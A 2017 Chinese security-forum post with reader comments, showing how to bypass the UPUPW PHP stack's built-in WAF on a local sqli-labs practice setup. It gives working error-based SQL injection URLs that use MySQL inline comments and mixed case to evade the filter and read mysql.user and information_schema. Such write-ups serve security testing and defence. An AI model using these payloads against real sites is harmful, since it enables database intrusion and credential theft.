投稿文章:UPUPW注入绕过(php+mysql+apache)

2017-07-04 19:16:22 8 5254
Apache版UPUPW

介绍:

UPUPW是目前Windows平台下最具特色的Web服务器PHP套件,包括Apache版、Ngix版和Kangle版:Apache/Nginx+PHP+MySQL+phpMyAdmin+Xdebug+Memcached+eAccelerator+ZendGuardLoader/Optimizer+。UPUPW PHP套件省去了您搭建Web服务器PHP环境的复杂程序,下载解压到装有任意Windows系统电脑的非中文目录即可运行。绿色,安全,稳定,高速!UPUPW自身带有waf的功能。


环境:

Win7
Sqllibs
Apache版UPUPW PHP5.6系列


安装好后开启upupw自带的防注入功能:




测试select from:




利用内联即可。

即然select from 能绕, 那我们就可以用报错注入。

直接使用updatexml函数测试,upupw没有防注:


concat也没有挡截:


select 1:


利用上面的/*!36000select*/from, 可以这样注:
http://localhost/sqli-labs-master/Less-1/?id=1'  and updatexml(1,concat('~',(/*!36000select 1*/ from mysql.user ),'~'),3)-- -


关键是select from, 用内联, 把字段写到/*!36000select  */里。
后面如果再有防注提示的话, 再用内联, 配合太小写混合即可绕过。
http://localhost/sqli-labs-master/Less-1/?id=1'  and updatexml(1,concat('~',(/*!36000select table_name*/ from /*!information_schema*/.tAbleS limit 1),'~'),3)-- -

关于作者

perl63篇文章36篇回复

评论8次

要评论?请先  登录  或  注册
  • 8楼
    2017-7-7 23:02

    在用这个,都不知道这个玩意 还有waf功能

  • 7楼
    2017-7-5 09:17

    收藏,偶尔碰到用这个环境的站点

  • 6楼
    2017-7-5 09:03

    毕竟只是个server容器 我不相信他的防护功能很突出

  • 5楼
    2017-7-5 08:45

    都是基于正则的拦截,关键是拦截的字符还那么少,约等于自己玩一玩

  • 4楼
    2017-7-4 23:51
    没睡的风

    很调皮,不过这个玩意只要有人维护,后续也会很麻烦,绕过就恶心了,国内的公司都是,盯着这些论坛,高调的人,只要是新技术,48小时内生成方案,一周内写好防护,之后,全拦截,用大众的智慧为他们赚钱,恶心

    1

    这个很正常啊,我要是搞产品我也来着盯着你们

  • 3楼
    2017-7-4 21:21

    很调皮,不过这个玩意只要有人维护,后续也会很麻烦,绕过就恶心了,国内的公司都是,盯着这些论坛,高调的人,只要是新技术,48小时内生成方案,一周内写好防护,之后,全拦截,用大众的智慧为他们赚钱,恶心

  • 2楼
    2017-7-4 20:55

    我记得upupw还拦菜刀

  • 1楼
    2017-7-4 19:41

    upupw是一个特别逗的中间件,还有waf的功能。